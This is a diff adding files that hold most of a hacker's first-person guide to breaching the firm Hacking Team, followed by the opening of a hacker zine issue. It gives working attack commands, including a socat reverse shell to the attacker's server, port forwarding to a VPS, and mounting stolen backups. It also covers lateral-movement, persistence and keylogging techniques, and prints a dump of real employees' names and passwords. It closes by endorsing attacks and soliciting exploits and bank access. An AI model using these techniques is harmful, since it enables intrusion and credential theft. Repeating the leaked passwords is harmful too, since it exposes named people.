+ +[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html +[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf +[3] http://ha.ckers.org/fierce/ +[4] https://github.com/laramies/theHarvester +[5] https://bitbucket.org/LaNMaSteR53/recon-ng +[6] https://nmap.org/ +[7] https://zmap.io/ +[8] https://github.com/robertdavidgraham/masscan +[9] http://www.morningstarsecurity.com/research/whatweb +[10] http://blindelephant.sourceforge.net/ + + +----[ 4.2 - Social Information ]------------------------------------------------ + +For social engineering, it's useful to have information about the employees, +their roles, contact information, operating system, browser, plugins, +software, etc. Some resources are: + +1) Google + + Here as well, it's the most useful tool. + +2) theHarvester and recon-ng + + I already mentioned them in the previous section, but they have a lot more + functionality. They can find a lot of information quickly and + automatically. It's worth reading all their documentation. + +3) LinkedIn + + A lot of information about the employees can be found here. The company's + recruiters are the most likely to accept your connection requests. + +4) Data.com + + Previously known as jigsaw. They have contact information for many + employees. + +5) File Metadata + + A lot of information about employees and their systems can be found in + metadata of files the company has published. Useful tools for finding + files on the company's website and extracting the metadata are metagoofil + [1] and FOCA [2]. + +[1] https://github.com/laramies/metagoofil +[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html + + +--[ 5 - Entering the network ]-------------------------------------------------- + +There are various ways to get a foothold. 
Since the method I used against +Hacking Team is uncommon and a lot more work than is usually necessary, I'll +talk a little about the two most common ways, which I recommend trying first. + + +----[ 5.1 - Social Engineering ]------------------------------------------------ + +Social engineering, specifically spear phishing, is responsible for the +majority of hacks these days. For an introduction in Spanish, see [1]. For +more information in English, see [2] (the third part, "Targeted Attacks"). For +fun stories about the social engineering exploits of past generations, see +[3]. I didn't want to try to spear phish Hacking Team, as their whole business +is helping governments spear phish their opponents, so they'd be much more +likely to recognize and investigate a spear phishing attempt. + +[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html +[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ +[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf + + +----[ 5.2 - Buying Access ]----------------------------------------------------- + +Thanks to hardworking Russians and their exploit kits, traffic sellers, and +bot herders, many companies already have compromised computers in their +networks. Almost all of the Fortune 500, with their huge networks, have some +bots already inside. However, Hacking Team is a very small company, and most +of it's employees are infosec experts, so there was a low chance that they'd +already been compromised. + + +----[ 5.3 - Technical Exploitation ]-------------------------------------------- + +After the Gamma Group hack, I described a process for searching for +vulnerabilities [1]. Hacking Team had one public IP range: +inetnum: 93.62.139.32 - 93.62.139.47 +descr: HT public subnet + +Hacking Team had very little exposed to the internet. For example, unlike +Gamma Group, their customer support site needed a client certificate to +connect. 
What they had was their main website (a Joomla blog in which Joomscan +[2] didn't find anything serious), a mail server, a couple routers, two VPN +appliances, and a spam filtering appliance. So, I had three options: look for +a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the +embedded devices. A 0day in an embedded device seemed like the easiest option, +and after two weeks of work reverse engineering, I got a remote root exploit. +Since the vulnerabilities still haven't been patched, I won't give more +details, but for more information on finding these kinds of vulnerabilities, +see [3] and [4]. + +[1] http://pastebin.com/raw.php?i=cRYvK4jb +[2] http://sourceforge.net/projects/joomscan/ +[3] http://www.devttys0.com/ +[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A + + +--[ 6 - Be Prepared ]----------------------------------------------------------- + +I did a lot of work and testing before using the exploit against Hacking Team. +I wrote a backdoored firmware, and compiled various post-exploitation tools +for the embedded device. The backdoor serves to protect the exploit. Using the +exploit just once and then returning through the backdoor makes it harder to +identify and patch the vulnerabilities. + +The post-exploitation tools that I'd prepared were: + +1) busybox + + For all the standard Unix utilities that the system didn't have. + +2) nmap + + To scan and fingerprint Hacking Team's internal network. + +3) Responder.py + + The most useful tool for attacking windows networks when you have access to + the internal network, but no domain user. + +4) Python + + To execute Responder.py + +5) tcpdump + + For sniffing traffic. + +6) dsniff + + For sniffing passwords from plaintext protocols like ftp, and for + arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR + and NaGA, but it was hard to compile it for the system. 
+ +7) socat + + For a comfortable shell with a pty: + my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port + hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ + tcp:my_server:my_port + + And useful for a lot more, it's a networking swiss army knife. See the + examples section of its documentation. + +8) screen + + Like the shell with pty, it wasn't really necessary, but I wanted to feel + at home in Hacking Team's network. + +9) a SOCKS proxy server + + To use with proxychains to be able to access their local network from any + program. + +10) tgcd + + For forwarding ports, like for the SOCKS server, through the firewall. + +[1] https://www.busybox.net/ +[2] https://nmap.org/ +[3] https://github.com/SpiderLabs/Responder +[4] https://github.com/bendmorris/static-python +[5] http://www.tcpdump.org/ +[6] http://www.monkey.org/~dugsong/dsniff/ +[7] http://www.dest-unreach.org/socat/ +[8] https://www.gnu.org/software/screen/ +[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html +[10] http://tgcd.sourceforge.net/ + + +The worst thing that could happen would be for my backdoor or post-exploitation +tools to make the system unstable and cause an employee to investigate. So I +spent a week testing my exploit, backdoor, and post-exploitation tools in the +networks of other vulnerable companies before entering Hacking Team's network. + + +--[ 7 - Watch and Listen ]------------------------------------------------------ + +Now inside their internal network, I wanted to take a look around and think +about my next step. I started Responder.py in analysis mode (-A to listen +without sending poisoned responses), and did a slow scan with nmap. + + +--[ 8 - NoSQL Databases ]------------------------------------------------------- + +NoSQL, or rather NoAuthentication, has been a huge gift to the hacker +community [1]. 
Just when I was worried that they'd finally patched all of the +authentication bypass bugs in MySQL [2][3][4][5], new databases came into +style that lack authentication by design. Nmap found a few in Hacking Team's +internal network: + +27017/tcp open mongodb MongoDB 2.6.5 +| mongodb-databases: +| ok = 1 +| totalSizeMb = 47547 +| totalSize = 49856643072 +... +|_ version = 2.6.5 + +27017/tcp open mongodb MongoDB 2.6.5 +| mongodb-databases: +| ok = 1 +| totalSizeMb = 31987 +| totalSize = 33540800512 +| databases +... +|_ version = 2.6.5 + +They were the databases for test instances of RCS. The audio that RCS records +is stored in MongoDB with GridFS. The audio folder in the torrent [6] came +from this. They were spying on themselves without meaning to. + +[1] https://www.shodan.io/search?query=product%3Amongodb +[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql +[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html +[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c +[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html +[6] https://ht.transparencytoolkit.org/audio/ + + +--[ 9 - Crossed Cables ]-------------------------------------------------------- + +Although it was fun to listen to recordings and see webcam images of Hacking +Team developing their malware, it wasn't very useful. Their insecure backups +were the vulnerability that opened their doors. According to their +documentation [1], their iSCSI devices were supposed to be on a separate +network, but nmap found a few in their subnetwork 192.168.1.200/24: + +Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) +... +3260/tcp open iscsi? 
+| iscsi-info: +| Target: iqn.2000-01.com.synology:ht-synology.name +| Address: 192.168.200.66:3260,0 +|_ Authentication: No authentication required + +Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) +... +3260/tcp open iscsi? +| iscsi-info: +| Target: iqn.2000-01.com.synology:synology-backup.name +| Address: 10.0.1.72:3260,0 +| Address: 192.168.200.72:3260,0 +|_ Authentication: No authentication required + +iSCSI needs a kernel module, and it would've been difficult to compile it for +the embedded system. I forwarded the port so that I could mount it from a VPS: + +VPS: tgcd -L -p 3260 -q 42838 +Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838 + +VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1 + +Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it +because it thinks its IP is 192.168.200.72 instead of 127.0.0.1 + +The way I solved it was: +iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1 + +And now, after: +iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login + +...the device file appears! We mount it: +vmfs-fuse -o ro /dev/sdb1 /mnt/tmp + +and find backups of various virtual machines. The Exchange server seemed like +the most interesting. 
It was too big too download, but it was possible to +mount it remotely to look for interesting files: +$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk +$ fdisk -l /dev/loop0 +/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT + +so the offset is 2048 * 512 = 1048576 +$ losetup -o 1048576 /dev/loop1 /dev/loop0 +$ mount -o ro /dev/loop1 /mnt/exchange/ + +now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 +we find the hard disk of the VM, and mount it: +vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ +mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1 + +...and finally we've unpacked the Russian doll and can see all the files from +the old Exchange server in /mnt/part1 + +[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf + + +--[ 10 - From backups to domain admin ]----------------------------------------- + +What interested me most in the backup was seeing if it had a password or hash +that could be used to access the live server. I used pwdump, cachedump, and +lsadump [1] on the registry hives. lsadump found the password to the besadmin +service account: + +_SC_BlackBerry MDS Connection Service +0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8. +0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!........... + +I used proxychains [2] with the socks server on the embedded device and +smbclient [3] to check the password: +proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!' + +It worked! The password for besadmin was still valid, and a local admin. I +used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. +Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and +got a bunch of passwords, including the Domain Admin: + +HACKINGTEAM BESAdmin bes32678!!! 
+HACKINGTEAM Administrator uu8dd8ndd12! +HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin +HACKINGTEAM m.romeo ioLK/(90 +HACKINGTEAM l.guerra 4luc@=.= +HACKINGTEAM d.martinez W4tudul3sp +HACKINGTEAM g.russo GCBr0s0705! +HACKINGTEAM a.scarafile Cd4432996111 +HACKINGTEAM r.viscardi Ht2015! +HACKINGTEAM a.mino A!e$$andra +HACKINGTEAM m.bettini Ettore&Bella0314 +HACKINGTEAM m.luppi Blackou7 +HACKINGTEAM s.gallucci 1S9i8m4o! +HACKINGTEAM d.milan set!dob66 +HACKINGTEAM w.furlan Blu3.B3rry! +HACKINGTEAM d.romualdi Rd13136f@# +HACKINGTEAM l.invernizzi L0r3nz0123! +HACKINGTEAM e.ciceri 2O2571&2E +HACKINGTEAM e.rabe erab@4HT! + +[1] https://github.com/Neohapsis/creddump7 +[2] http://proxychains.sourceforge.net/ +[3] https://www.samba.org/ +[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf +[5] https://github.com/gentilkiwi/mimikatz + + +--[ 11 - Downloading the mail ]------------------------------------------------- + +With the Domain Admin password, I have access to the email, the heart of the +company. Since with each step I take there's a chance of being detected, I +start downloading their email before continuing to explore. Powershell makes +it easy [1]. Curiously, I found a bug with Powershell's date handling. After +downloading the emails, it took me another couple weeks to get access to the +source code and everything else, so I returned every now and then to download +the new emails. The server was Italian, with dates in the format +day/month/year. I used: +-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} + +with New-MailboxExportRequest to download the new emails (in this case all +mail since June 5). The problem is it says the date is invalid if you +try a day larger than 12 (I imagine because in the US the month comes first +and you can't have a month above 12). It seems like Microsoft's engineers only +test their software with their own locale. 
+ +[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ + + +--[ 12 - Downloading Files ]---------------------------------------------------- + +Now that I'd gotten Domain Admin, I started to download file shares using my +proxy and the -Tc option of smbclient, for example: + +proxychains smbclient '//192.168.1.230/FAE DiskStation' \ + -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' + +I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in +the torrent like that. + + +--[ 13 - Introduction to hacking windows domains ]------------------------------ + +Before continuing with the story of the "weones culiaos" (Hacking Team), I +should give some general knowledge for hacking windows networks. + + +----[ 13.1 - Lateral Movement ]------------------------------------------------- + +I'll give a brief review of the different techniques for spreading withing a +windows network. The techniques for remote execution require the password or +hash of a local admin on the target. By far, the most common way of obtaining +those credentials is using mimikatz [1], especially sekurlsa::logonpasswords +and sekurlsa::msv, on the computers where you already have admin access. The +techniques for "in place" movement also require administrative privileges +(except for runas). The most important tools for privilege escalation are +PowerUp [2], and bypassuac [3]. + +[1] https://adsecurity.org/?page_id=1821 +[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp +[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 + + +Remote Movement: + +1) psexec + + The tried and true method for lateral movement on windows. You can use + psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's + invoke_psexec [4], or the builtin windows command "sc" [5]. 
For the + metasploit module, powershell empire, and pth-winexe [6], you just need the + hash, not the password. It's the most universal method (it works on any + windows computer with port 445 open), but it's also the least stealthy. + Event type 7045 "Service Control Manager" will appear in the event logs. In + my experience, no one has ever noticed during a hack, but it helps the + investigators piece together what the hacker did afterwards. + +2) WMI + + The most stealthy method. The WMI service is enabled on all windows + computers, but except for servers, the firewall blocks it by default. You + can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and + pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin + wmic [5]. All except wmic just need the hash. + +3) PSRemoting [10] + + It's disabled by default, and I don't recommend enabling new protocols. + But, if the sysadmin has already enabled it, it's very convenient, + especially if you use powershell for everything (and you should use + powershell for almost everything, it will change [11] with powershell 5 and + windows 10, but for now powershell makes it easy to do everything in RAM, + avoid AV, and leave a small footprint) + +4) Scheduled Tasks + + You can execute remote programs with at and schtasks [5]. It works in the + same situations where you could use psexec, and it also leaves a well known + footprint [12]. + +5) GPO + + If all those protocols are disabled or blocked by the firewall, once you're + Domain Admin, you can use GPO to give users a login script, install an msi, + execute a scheduled task [13], or, like we'll see with the computer of + Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and + open the firewall. 
+ +[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx +[2] https://sourceforge.net/projects/winexe/ +[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh +[4] http://www.powershellempire.com/?page_id=523 +[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ +[6] https://github.com/byt3bl33d3r/pth-toolkit +[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py +[8] https://www.trustedsec.com/june-2015/no_psexec_needed/ +[9] http://www.powershellempire.com/?page_id=124 +[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ +[11] https://adsecurity.org/?p=2277 +[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems +[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py + + +"In place" Movement: + +1) Token Stealing + + Once you have admin access on a computer, you can use the tokens of the + other users to access resources in the domain. Two tools for doing this are + incognito [1] and the mimikatz token::* commands [2]. + +2) MS14-068 + + You can take advantage of a validation bug in Kerberos to generate Domain + Admin tickets [3][4][5]. + +3) Pass the Hash + + If you have a user's hash, but they're not logged in, you can use + sekurlsa::pth [2] to get a ticket for the user. + +4) Process Injection + + Any RAT can inject itself into other processes. For example, the migrate + command in meterpreter and pupy [6], or the psinject [7] command in + powershell empire. You can inject into the process that has the token you + want. + +5) runas + + This is sometimes very useful since it doesn't require admin privileges. + The command is part of windows, but if you don't have a GUI you can use + powershell [8]. 
+ +[1] https://www.indetectables.net/viewtopic.php?p=211165 +[2] https://adsecurity.org/?page_id=1821 +[3] https://github.com/bidord/pykek +[4] https://adsecurity.org/?p=676 +[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html +[6] https://github.com/n1nj4sec/pupy +[7] http://www.powershellempire.com/?page_id=273 +[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 + + +----[ 13.2 - Persistence ]------------------------------------------------------ + +Once you have access, you want to keep it. Really, persistence is only a +challenge for assholes like Hacking Team who target activists and other +individuals. To hack companies, persistence isn't needed since companies never +sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple +high-uptime servers. On the off chance that they all reboot at the same time, +I have passwords and a golden ticket [1] as backup access. You can read more +about the different techniques for persistence in windows here [2][3][4]. But +for hacking companies, it's not needed and it increases the risk of detection. + +[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ +[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ +[3] http://www.hexacorn.com/blog/category/autostart-persistence/ +[4] https://blog.netspi.com/tag/persistence/ + + +----[ 13.3 - Internal reconnaissance ]------------------------------------------ + +The best tool these days for understanding windows networks is Powerview [1]. +It's worth reading everything written by it's author [2], especially [3], [4], +[5], and [6]. Powershell itself is also quite powerful [7]. As there are still +many windows 2000 and 2003 servers without powershell, you also have to learn +the old school [8], with programs like netview.exe [9] or the windows builtin +"net view". 
Other techniques that I like are: + +1) Downloading a list of file names + + With a Domain Admin account, you can download a list of all filenames in + the network with powerview: + + Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | + select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] | + select fullname | out-file -append files.txt} + + Later, you can read it at your leisure and choose which files to download. + +2) Reading email + + As we've already seen, you can download email with powershell, and it has a + lot of useful information. + +3) Reading sharepoint + + It's another place where many businesses store a lot of important + information. It can also be downloaded with powershell [10]. + +4) Active Directory [11] + + It has a lot of useful information about users and computers. Without being + Domain Admin, you can already get a lot of info with powerview and other + tools [12]. After getting Domain Admin, you should export all the AD + information with csvde or another tool. + +5) Spy on the employees + + One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi + (one of Hacking Team's sysadmins) gave me access to a Nagios server which + gave me access to the rete sviluppo (development network with the source + code of RCS). With a simple combination of Get-Keystrokes and + Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang + [14], and GPO, you can spy on any employee, or even on the whole domain. 
+ +[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView +[2] http://www.harmj0y.net/blog/tag/powerview/ +[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ +[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ +[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ +[6] http://www.slideshare.net/harmj0y/i-have-the-powerview +[7] https://adsecurity.org/?p=2535 +[8] https://www.youtube.com/watch?v=rpwrKhgMd7E +[9] https://github.com/mubix/netview +[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ +[11] https://adsecurity.org/?page_id=41 +[12] http://www.darkoperator.com/?tag=Active+Directory +[13] https://github.com/PowerShellMafia/PowerSploit +[14] https://github.com/samratashok/nishang + + +--[ 14 - Hunting Sysadmins ]---------------------------------------------------- + +Reading their documentation about their infrastructure [1], I saw that I was +still missing access to something important - the "Rete Sviluppo", an isolated +network with the source code for RCS. The sysadmins of a company always have +access to everything, so I searched the computers of Mauro Romeo and Christian +Pozzi to see how they administer the Sviluppo network, and to see if there +were any other interesting systems I should investigate. It was simple to +access their computers, since they were part of the windows domain where I'd +already gotten admin access. Mauro Romeo's computer didn't have any ports +open, so I opened the port for WMI [2] and executed meterpreter [3]. In +addition to keylogging and screen scraping with Get-Keystrokes and +Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 +[4], and searched for interesting files [5]. Upon seeing that Pozzi had a +Truecrypt volume, I waited until he'd mounted it and then copied off the +files. 
Many have made fun of Christian Pozzi's weak passwords (and of +Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I +included them in the leak as a false clue, and to laugh at him. The reality is +that mimikatz and keyloggers view all passwords equally. + +[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ +[2] http://www.hammer-software.com/wmigphowto.shtml +[3] https://www.trustedsec.com/june-2015/no_psexec_needed/ +[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde +[5] http://pwnwiki.io/#!presence/windows/find_files.md +[6] http://archive.is/TbaPy +[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ +[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt +[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ + + +--[ 15 - The bridge ]----------------------------------------------------------- + +Within Christian Pozzi's Truecrypt volume, there was a textfile with many +passwords [1]. One of those was for a Fully Automated Nagios server, which had +access to the Sviluppo network in order to monitor it. I'd found the bridge I +needed. The textfile just had the password to the web interface, but there was +a public code execution exploit [2] (it's an unauthenticated exploit, but it +requires that at least one user has a session initiated, for which I used the +password from the textfile). + +[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt +[2] http://seclists.org/fulldisclosure/2014/Oct/78 + + +--[ 16 - Reusing and resetting passwords ]-------------------------------------- + +Reading the emails, I'd seen Daniele Milan granting access to git repos. I +already had his windows password thanks to mimikatz. I tried it on the git +server and it worked. Then I tried sudo and it worked. 
For the gitlab server +and their twitter account, I used the "forgot my password" function along with +my access to their mail server to reset the passwords. + + +--[ 17 - Conclusion ]----------------------------------------------------------- + +That's all it takes to take down a company and stop their human rights abuses. +That's the beauty and asymmetry of hacking: with 100 hours of work, one person +can undo years of work by a multi-million dollar company. Hacking gives the +underdog a chance to fight and win. + +Hacking guides often end with a disclaimer: this information is for +educational purposes only, be an ethical hacker, don't attack systems you +don't have permission to, etc. I'll say the same, but with a more rebellious +conception of "ethical" hacking. Leaking documents, expropriating money from +banks, and working to secure the computers of ordinary people is ethical +hacking. However, most people that call themselves "ethical hackers" just work +to secure those who pay their high consulting fees, who are often those most +deserving to be hacked. + +Hacking Team saw themselves as part of a long line of inspired Italian design +[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, +and government, as part of a long tradition of Italian fascism. I'd like to +dedicate this guide to the victims of the raid on the Armando Diaz school, and +to all those who have had their blood spilled by Italian fascists. + +[1] https://twitter.com/coracurrier/status/618104723263090688 + + +--[ 18 - Contact ]-------------------------------------------------------------- + +To send me spear phishing attempts, death threats in Italian [1][2], and to +give me 0days or access inside banks, corporations, governments, etc. 
+ +[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ +[2] https://twitter.com/CthulhuSec/status/619459002854977537 + +only encrypted email please: +https://securityinabox.org/es/thunderbird_usarenigmail +-----BEGIN PGP PUBLIC KEY BLOCK----- + +mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx +vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g +27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x ++fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h +VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 +Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh +Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL +BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac +QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf +cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 +JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys +4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 +X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E +VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai +oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm +n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F +Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 +WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo +jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK +CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA +OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR +LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi +JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq +Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB +D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k +=E5+y +-----END PGP PUBLIC KEY BLOCK----- + + + + If not you, who? If not now, when? 
+ _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) \ No newline at end of file diff --git a/owned and exposed/2.txt b/owned and exposed/2.txt new file mode 100644 index 0000000..d888272 --- /dev/null +++ b/owned and exposed/2.txt 
@@ -0,0 +1,4975 @@ + |\___/| + -=[ISSUE - NO 2]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| +------------------------.++- + / y- + / y- +---------------------/ s/----------------------.++- + / ys+-. |\ / y- +---------------\.../ /\ ys------/()/ / y- + sy \/ /'''\ \| / s/- +------------------+-++s /-----' / s+-. +---------------------/s /-------------\.../ /\ ys + -y s sy \/ /'''\ +-----------------------y s---------------------++s /-----' +----------------------++' |\ /s / +-------------------------------------/()/ -y ys + \| -y s +-------------------------------------------------++' + |_______________ +,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _| carders.cc `\ +|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| inj3ct0r \ + ~ Featuring ~ | ettercap \ + _______________| |___________________\ + /´ exploit-db | ! + / backtrack |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._, + / free-hack |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| + /___________________| ~ and ~ + ! + + Out of the Blue + into the Black +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ INTRO ~ ! + +Greetings followers, welcome to the second issue of owned and exp0sed. +This file is encoded with UTF-8, so to view it properly use unicode. 
